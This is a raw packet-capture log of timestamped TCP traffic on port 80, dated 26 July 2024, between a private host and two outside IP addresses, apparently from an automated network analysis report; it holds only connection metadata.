Jul 26, 2024 17:56:16.803940058 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.803966999 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.803986073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.803992033 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.803996086 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.804007053 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.804018021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.804028034 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.804030895 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.804039001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.804058075 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.804075956 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.804425001 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.804435968 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.804445982 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.804456949 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.804467916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.804466963 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.804478884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.804496050 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.804506063 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.804517031 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.804517984 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.804517984 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.804543972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.804568052 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.804980993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.804991961 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.805006027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.805016994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.805025101 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.805027962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.805038929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.805048943 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.805058002 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.805061102 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.805072069 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.805078983 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.805082083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.805094004 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.805099964 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.805105925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.805119038 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.805120945 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.805129051 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.805140972 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.805141926 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.805152893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.805161953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.805165052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.805198908 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.805212021 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.805381060 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.805391073 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.805401087 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.805411100 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.805421114 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.805429935 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.805432081 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.805442095 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.805450916 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.805453062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.805473089 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.805500031 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.884849072 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.884896994 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.884906054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.884911060 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.884932995 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.884953022 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.884980917 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.884991884 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.885001898 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.885010958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.885023117 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.885024071 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.885061979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.885529041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.885540962 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.885551929 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.885562897 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.885571957 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.885581970 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.885582924 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.885591984 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.885601997 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.885612965 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.885612965 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.885622978 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.885658979 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.885675907 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.885833979 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.885845900 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.885875940 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.885972977 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.885984898 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.885993958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.886004925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.886014938 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.886014938 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.886025906 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.886045933 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.886053085 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.886063099 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.886068106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.886077881 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.886090040 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.886101007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.886111021 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.886121035 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.886131048 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.886136055 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.886141062 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.886152029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.886162043 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.886172056 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.886178017 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.886199951 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.886219025 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.889219999 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.889233112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.889244080 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:16.889297962 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.889323950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.922194004 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:16.928556919 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.107772112 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.107801914 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.107815027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.107887030 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.107898951 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.107911110 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.107923985 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.107939005 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.107975960 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.108023882 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.108036041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.108048916 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.108073950 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.108098030 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.108102083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.108114958 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.108125925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.108138084 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.108149052 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.108150005 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.108172894 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.108201981 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.108558893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.108572006 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.108582020 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.108592987 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.108599901 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.108608007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.108619928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.108624935 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.108632088 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.108642101 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.108653069 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.108654022 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.108664989 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.108676910 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.108681917 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.108690023 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.108701944 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.108701944 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.108712912 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.108722925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.108725071 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.108737946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.108742952 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.108771086 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.109061003 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.109072924 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.109085083 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.109095097 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.109101057 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.109108925 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.109119892 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.109136105 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.109159946 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.109205008 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.109215975 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.109227896 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.109251976 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.109252930 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.109270096 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.109272957 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.109282017 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.109291077 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.109301090 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.109302044 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.109313965 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.109323978 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.109334946 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.109337091 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.109347105 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.109359026 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.109369993 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.109380007 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.109391928 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.109399080 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.109405041 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.109415054 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.109424114 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.109446049 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.109476089 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.110120058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.110132933 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.110142946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.110155106 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.110166073 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.110167027 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.110178947 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.110186100 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.110189915 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.110203028 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.110215902 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.110225916 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.110227108 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.110239029 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.110246897 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.110249996 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.110275984 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.110302925 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.596580029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.596601963 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:17.787139893 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:17.787143946 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:18.341721058 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:18.341840029 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:18.387275934 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:18.411528111 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:18.599847078 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:18.599863052 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:18.599870920 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:18.600112915 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:18.603230953 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:18.609560013 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:18.791321039 CEST	80	49704	85.28.47.31	192.168.2.5
Jul 26, 2024 17:56:18.791383982 CEST	49704	80	192.168.2.5	85.28.47.31
Jul 26, 2024 17:56:18.802464962 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:18.810018063 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:18.810121059 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:18.810400963 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:18.816890001 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.618563890 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.618576050 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.618587971 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.618597984 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.618608952 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.618619919 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.618630886 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.618658066 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.618658066 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.618689060 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.618699074 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.618709087 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.618722916 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.618722916 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.618750095 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.618750095 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.623598099 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.623657942 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.623692036 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.623733997 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.781626940 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.781651020 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.781661987 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.781672001 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.781681061 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.781747103 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.781747103 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.782917976 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.782927990 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.782938004 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.782948017 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.782958031 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.782968044 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.782977104 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.782985926 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.782994986 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.783005953 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.783015013 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.783019066 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.783019066 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.783025980 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.783035994 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.783044100 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.783046961 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.783061028 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.783061028 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.783103943 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.783483028 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.783518076 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.783530951 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.783565998 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.868726015 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.868772030 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.868781090 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.868868113 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.868868113 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.908840895 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.908875942 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.908889055 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.908996105 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.909055948 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.909066916 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.909471989 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.909545898 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.909549952 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.909549952 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.909562111 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.909702063 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.909713030 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.909748077 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.909748077 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.910202026 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.910296917 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.910306931 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.910319090 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.910371065 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.910371065 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.910479069 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.910851955 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.911854982 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.911901951 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.911901951 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.911959887 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.911971092 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.911982059 CEST	80	49705	185.215.113.16	192.168.2.5
Jul 26, 2024 17:56:19.912013054 CEST	49705	80	192.168.2.5	185.215.113.16
Jul 26, 2024 17:56:19.912013054 CEST	49705	80	192.168.2.5	185.215.113.16
